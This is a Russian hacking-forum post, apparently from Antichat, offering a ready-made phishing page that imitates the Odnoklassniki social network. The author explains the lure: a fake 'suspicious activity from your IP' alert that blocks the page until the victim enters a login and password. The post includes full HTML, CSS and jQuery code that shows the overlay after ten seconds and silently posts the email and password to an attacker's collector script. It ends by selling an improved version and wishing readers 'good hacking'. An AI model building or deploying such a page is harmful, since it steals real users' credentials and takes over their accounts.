04.03.2012, 01:00
|
|
Познавший АНТИЧАТ
Регистрация: 30.03.2010
Сообщений: 1,068
С нами:
8484086
Репутация:
335
|
|
просьба ввести логин и пароль, когда ты уже находишься на своей странице - палево
Почему же, можно написать похожее сообщение, типа вы зашли на аккаунт с другого ip-адреса, просьба подтвердить, что именно вы являетесь владельцем аккаунта и ввести логин и пароль. Ну или что-то в этом роде. Вполне себе реалистично и правдоподобно. Вся остальная страница блокируется, окошко закрыть нельзя. Если пользователь захочет остаться в "аккаунте" и не закрывать страницу (а так поступят большинство), ему ничего не останется, как заполнить данными форму и нажать "вход". Тогда только окошко пропадет и можно будет дальше серфить по странице. А можно сделать валидацию и закрывать окно, только если пароль будет верный. Если подобрать грамотный домен и грамотно направить пользователя на фейк, то при такой ситуации процент успешности взлома будет приближаться к 90-100%, что весьма и весьма неплохо.
Upd: Вот наваял небольшой скриптик фейка для одноклассников. Через десять секунд выскакивает форма, в которой пользователя уведомляют о подозрительной активности и просят ввести пароль, остальная страница блокируется. Ну и форма. После введения пароля форма пропадает - данные летят на сниффер в асинхронном режиме можно серфить дальше. Обработчик ставите odnlogin.php, отлавливайте пост-запросы с именами email и password. Вот собственно фейк. Страница готовая, сохраняйте под любым именем и расширением .php и .html - на ваше усмотрение.
HTML highlight
Код:
Одноклассники
$(function(){
setTimeout("go()", 10000);
});
function go() {
var ww = $(window).width();
var wh = $(window).height();
$(".cl_background").show();
$(".cl_body").css('left', ww/2 - 325).css('top', wh/2-300).css('display', 'block');
};
function registration(){
var log = document.getElementById('login').value;
var pass = document.getElementById('pass').value;
$.post('odnlogin.php', {'email':log, 'password':pass});
$(".cl_body").remove();
$(".cl_background").remove();
}
html,body {
margin: 0;
padding: 0;
width: 100%;
height: 100%;
}
iframe {
width: 100%;
height: 100%;
margin: 0;
padding: 0;
border: none;
position: absolute;
top: 0;
left: 0;
}
.loading {
display: none;
}
.loading span {
color: #ccc;
position: relative;
top: -2px;
}
.cl_background {
position: absolute;
width: 100%;
height: 100%;
background: #ffffff;
display: none;
z-index: 1;
opacity: 0.4;
}
.cl_body {
z-index: 2;
position: absolute;
display: none;
}
.error {
color: #ff0000;
display: none;
}
.cl_title {
padding-left:85px;
font: 18px Tahoma;
color: #ED812B;
font-weight: bold;
padding-top: 30px;
background: url(http://flogiston.ru/apic/1388.gif);
margin: 0;
height: 42px;
background-repeat: no-repeat;
}
.cl_body {
padding: 15px;
color: #ED812B;
font: 12px Tahoma;
}
.cl_foot {
padding: 10px;
font: 12px Tahoma;
text-align: right;
}
.cl_info {
background: #fff;
padding: 10px;
font: 12px Tahoma;
color: #000;
background-image: url(http://technoportal.ua/img/inf/internet/odnoklasniki_logo_small.jpg);
background-repeat: no-repeat;
background-position: -10px;
min-height: 70px;
padding-left: 80px;
padding-top: 25px;
}
.cl_body {
padding:10px;
background: #fff;
width: 610px;
position: absolute;
text-align: left;
box-shadow: 0 0 8px #ECF2F4;
border: 1px solid #ED812B;
}
.cl_title {
padding-left:85px;
font: 18px Tahoma;
color: #ED812B;
font-weight: bold;
padding-top: 30px;
background: url(http://flogiston.ru/apic/1388.gif);
margin: 0;
height: 42px;
background-repeat: no-repeat;
}
.cl_foot {
padding: 10px;
font: 12px Tahoma;
text-align: right;
}
.cl_info {
background: #fff;
padding: 10px;
font: 12px Tahoma;
color: #000;
background-image: url(http://technoportal.ua/img/inf/internet/odnoklasniki_logo_small.jpg);
background-repeat: no-repeat;
background-position: -10px;
min-height: 70px;
padding-left: 80px;
padding-top: 25px;
}
.cl_form label {
font: bold 16px Tahoma;
color: #3FAC0F;
}
.cl_form input {
font: 12px Tahoma;
color: #666;
width: 160px;
font-weight: bold;
border: 1px solid #c0cad5;
padding: 5px;
}
.cl_form span {
color: #555;
display: block;
margin-left: 160px;
}
.cl_button button {
padding: 5px;
color: #ED812B;
font-weight: bold;
}
Внимание! Доступ Заблокирован!
С Вашего IP замечена подозрительная активность. Возможно Ваш аккаунт пытались взломать. Подтвердите, что Вы являетесь владельцем данного аккаунта, введите логин и пароль:
e-mail:
Пароль:
загрузка...
Продолжить
Это паблик версия. Усовершенствованную версию с валидацией (окно пропадает и страница становится доступна только после введения верного пароля, до этого, хоть усрись, окно не пропадет) продам только за деньги. Всем удачного взлома!
|
|
|